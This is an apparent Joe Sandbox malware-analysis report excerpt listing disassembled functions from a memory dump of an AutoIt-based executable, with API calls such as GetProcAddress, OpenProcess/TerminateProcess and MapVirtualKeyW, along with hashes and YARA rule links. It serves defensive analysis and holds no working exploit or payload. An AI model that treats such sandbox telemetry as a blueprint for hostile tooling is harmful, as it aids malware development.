                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 603618608-0
                                                                                                                                        • Opcode ID: 217d07c13b8815542e18bd869ce72a11471e8e5499089306f0c35c635ca076fa
                                                                                                                                        • Instruction ID: 4bdbe1f8bbb89e651cccac4f83833f2be7d488d989b698f0546cc8a9edcc7bb7
                                                                                                                                        • Opcode Fuzzy Hash: 217d07c13b8815542e18bd869ce72a11471e8e5499089306f0c35c635ca076fa
                                                                                                                                        • Instruction Fuzzy Hash: 2D018475A01249BFEF209BA59C49B5EBFB9EB48351F008066FA04AB280D6759C00CB61
                                                                                                                                        Function 007887D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __init_pointers.LIBCMT ref: 007887D7
                                                                                                                                          • Part of subcall function 00781E5A: __initp_misc_winsig.LIBCMT ref: 00781E7E
                                                                                                                                          • Part of subcall function 00781E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00788BE1
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00788BF5
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00788C08
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00788C1B
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00788C2E
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00788C41
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00788C54
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00788C67
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00788C7A
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00788C8D
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00788CA0
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00788CB3
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00788CC6
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00788CD9
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00788CEC
                                                                                                                                          • Part of subcall function 00781E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00788CFF
                                                                                                                                        • __mtinitlocks.LIBCMT ref: 007887DC
                                                                                                                                          • Part of subcall function 00788AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0081AC68,00000FA0,?,?,007887E1,00786AFA,008167D8,00000014), ref: 00788AD1
                                                                                                                                        • __mtterm.LIBCMT ref: 007887E5
                                                                                                                                          • Part of subcall function 0078884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 007889CF
                                                                                                                                          • Part of subcall function 0078884D: _free.LIBCMT ref: 007889D6
                                                                                                                                          • Part of subcall function 0078884D: RtlDeleteCriticalSection.NTDLL(0081AC68), ref: 007889F8
                                                                                                                                        • __calloc_crt.LIBCMT ref: 0078880A
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00788833
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2942034483-0
                                                                                                                                        • Opcode ID: b29496d5758aa2c67e7ea7a8f7c495474a223b8c93c5f7f06113f23519304c09
                                                                                                                                        • Instruction ID: a496846f7efebd438ffec115b2a12a0a103315e0cf16e5125b5f34fc0de373d9
                                                                                                                                        • Opcode Fuzzy Hash: b29496d5758aa2c67e7ea7a8f7c495474a223b8c93c5f7f06113f23519304c09
                                                                                                                                        • Instruction Fuzzy Hash: C4F096721D97519DE2F87778BC0B68626D49F01730BE4462AF460D50D2FF2888414757
                                                                                                                                        Function 007AA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1423608774-0
                                                                                                                                        • Opcode ID: 132312f9c4dd0b07b8d7ca6f7e6b0782c5cae55633fdaa24ca0caa8260b3f8e8
                                                                                                                                        • Instruction ID: 4d2c78d86225787a58de818dabba48149a3cb8e233fa68363117f0045cf57d5e
                                                                                                                                        • Opcode Fuzzy Hash: 132312f9c4dd0b07b8d7ca6f7e6b0782c5cae55633fdaa24ca0caa8260b3f8e8
                                                                                                                                        • Instruction Fuzzy Hash: C801A932102651EBDB356B54ED88DEB7769FFCE7117004629F6039A0A1CB7DAC00CB55
                                                                                                                                        Function 00761867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00761898
                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007618A0
                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007618AB
                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007618B6
                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007618BE
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007618C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                        • Opcode ID: 7ee41fe6a077d18259e23b0de24dbed5cda9d7ffd8cf9707f793553b43fe7733
                                                                                                                                        • Instruction ID: 98c07c66c9b0d04e11c9d0fe23900c025abfc584152ceee65a784ca739831703
                                                                                                                                        • Opcode Fuzzy Hash: 7ee41fe6a077d18259e23b0de24dbed5cda9d7ffd8cf9707f793553b43fe7733
                                                                                                                                        • Instruction Fuzzy Hash: CE016CB0902B597DE3008F6A8C85B52FFB8FF19354F04411B915C47941C7F5A864CBE5
                                                                                                                                        Function 007A84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007A8504
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007A851A
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 007A8529
                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A8538
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A8542
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A8549
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                        • Opcode ID: 5de4a678ed8a51f332118ed3f47b6e8cc08b8fe2cb1dc0e6eea621901383ca32
                                                                                                                                        • Instruction ID: 6c98d44525d2f6086587c9e1b4648ffe9f2c78592518c162b56cf6abac63ee00
                                                                                                                                        • Opcode Fuzzy Hash: 5de4a678ed8a51f332118ed3f47b6e8cc08b8fe2cb1dc0e6eea621901383ca32
                                                                                                                                        • Instruction Fuzzy Hash: 31F09032202198BFE73017529C4EEEF3A7CDFCAB51F004018FA0195050D7B82E01C6B9
                                                                                                                                        Function 007AA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 007AA330
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007AA341
                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,007D66D3,?,?,?,?,?,0076E681), ref: 007AA34E
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007D66D3,?,?,?,?,?,0076E681), ref: 007AA35B
                                                                                                                                          • Part of subcall function 007A9CCE: CloseHandle.KERNEL32(?,?,007AA368,?,?,?,007D66D3,?,?,?,?,?,0076E681), ref: 007A9CD8
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007AA36E
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007AA375
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                        • Opcode ID: 528e2f2f01d1040a1aebc54a688969a10544cc58eb3ca484d1c9a528e6aaf716
                                                                                                                                        • Instruction ID: bbfcd154bc461637cac65a254accd9a4ccc1b27ad7ce9684ea154614452116e6
                                                                                                                                        • Opcode Fuzzy Hash: 528e2f2f01d1040a1aebc54a688969a10544cc58eb3ca484d1c9a528e6aaf716
                                                                                                                                        • Instruction Fuzzy Hash: AEF05E32142251ABD7212B64ED8CDDB7B79FF8E312B004521F202990A1CBB99C11CB65
                                                                                                                                        Function 0076C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memmove.LIBCMT ref: 0076C419
                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,007A6653,?,?,00000000), ref: 0076C495
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead_memmove
                                                                                                                                        • String ID: Sfz
                                                                                                                                        • API String ID: 1325644223-315366904
                                                                                                                                        • Opcode ID: b1ad058501e7c6a2c4da28838337de7427762b44fdcd08b6efdb4c105af2da5c
                                                                                                                                        • Instruction ID: 1e2428eb51a47d5679d9c0ac74c7f1ea0d779029a14987902cfdce94d64e97fb
                                                                                                                                        • Opcode Fuzzy Hash: b1ad058501e7c6a2c4da28838337de7427762b44fdcd08b6efdb4c105af2da5c
                                                                                                                                        • Instruction Fuzzy Hash: 6CA1CF70A04649EBDB01CF56C8847B9FBB4FF05300F14C196E8969B385DB39D960DBA1
                                                                                                                                        Function 0077D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 0076BBD9: _memmove.LIBCMT ref: 0076BC33
                                                                                                                                        • __swprintf.LIBCMT ref: 0077D98F
                                                                                                                                        Strings
                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0077D832
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                                        • Opcode ID: bd3e974a737a1ca1b0f785f01817b23d41db2adf101753bc62e03e75500af90b
                                                                                                                                        • Instruction ID: 1e16d653619e127afca8fcb7a02aee512d0fced0720d7a1815e14f1be4e3f958
                                                                                                                                        • Opcode Fuzzy Hash: bd3e974a737a1ca1b0f785f01817b23d41db2adf101753bc62e03e75500af90b
                                                                                                                                        • Instruction Fuzzy Hash: B3916B71118201EFCB24EF24C889D6EB7B4FF85740F04491EF99A9B2A1DB28ED05CB52
                                                                                                                                        Function 007BB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BB4A8
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 007BB5B7
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007BB73A
                                                                                                                                          • Part of subcall function 007AA6F6: VariantInit.OLEAUT32(00000000), ref: 007AA736
                                                                                                                                          • Part of subcall function 007AA6F6: VariantCopy.OLEAUT32(?,?), ref: 007AA73F
                                                                                                                                          • Part of subcall function 007AA6F6: VariantClear.OLEAUT32(?), ref: 007AA74B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                        • Opcode ID: 5b3c2c5f9dc985f0fc2d7506c66eae57b090f5ef085e90f6af06f19c84a56830
                                                                                                                                        • Instruction ID: e34ecc7bf6f6f3768e828b3252f67ca54a41e6a16a1cff458737bda4780797ef
                                                                                                                                        • Opcode Fuzzy Hash: 5b3c2c5f9dc985f0fc2d7506c66eae57b090f5ef085e90f6af06f19c84a56830
                                                                                                                                        • Instruction Fuzzy Hash: 92916970608301DFCB10DF28C489A9ABBE4AFC9714F14896DF88A8B351DB79ED45CB52
                                                                                                                                        Function 007A5D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                        • _memset.LIBCMT ref: 007A5E56
                                                                                                                                        • GetMenuItemInfoW.USER32(?), ref: 007A5E85
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A5F31
                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007A5F5B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                                        • Opcode ID: 0134232c4301bfd1c2ad75071d30f809381c4d2e46eb4d2a101c49fb2ab3fefd
                                                                                                                                        • Instruction ID: e7e97e94e7a4141c1cb465f26378e68c8623700f1e556bba253960fcb4ce609f
                                                                                                                                        • Opcode Fuzzy Hash: 0134232c4301bfd1c2ad75071d30f809381c4d2e46eb4d2a101c49fb2ab3fefd
                                                                                                                                        • Instruction Fuzzy Hash: FD5113316087419ED7249B28C889AABB7E8EFD6350F18072DF896D71D0DB78CD44C792
                                                                                                                                        Function 007A1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007A10B8
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007A10EE
                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007A10FF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007A1181
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                        • Opcode ID: 2694aba77c64ddfd9ffd1d311cce9ac6af95a7b0f4fc9109d0cfeb6b41733a17
                                                                                                                                        • Instruction ID: 498ea68325173462513e960165931419c235e784329d2290c8677910412d8652
                                                                                                                                        • Opcode Fuzzy Hash: 2694aba77c64ddfd9ffd1d311cce9ac6af95a7b0f4fc9109d0cfeb6b41733a17
                                                                                                                                        • Instruction Fuzzy Hash: 50418F71600208EFEB15CF54CC84B9A7BBAEF86350F5482A9EA05DF245D7B9DD44CBA0
                                                                                                                                        Function 007A5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5A93
                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 007A5AAF
                                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007A5AF5
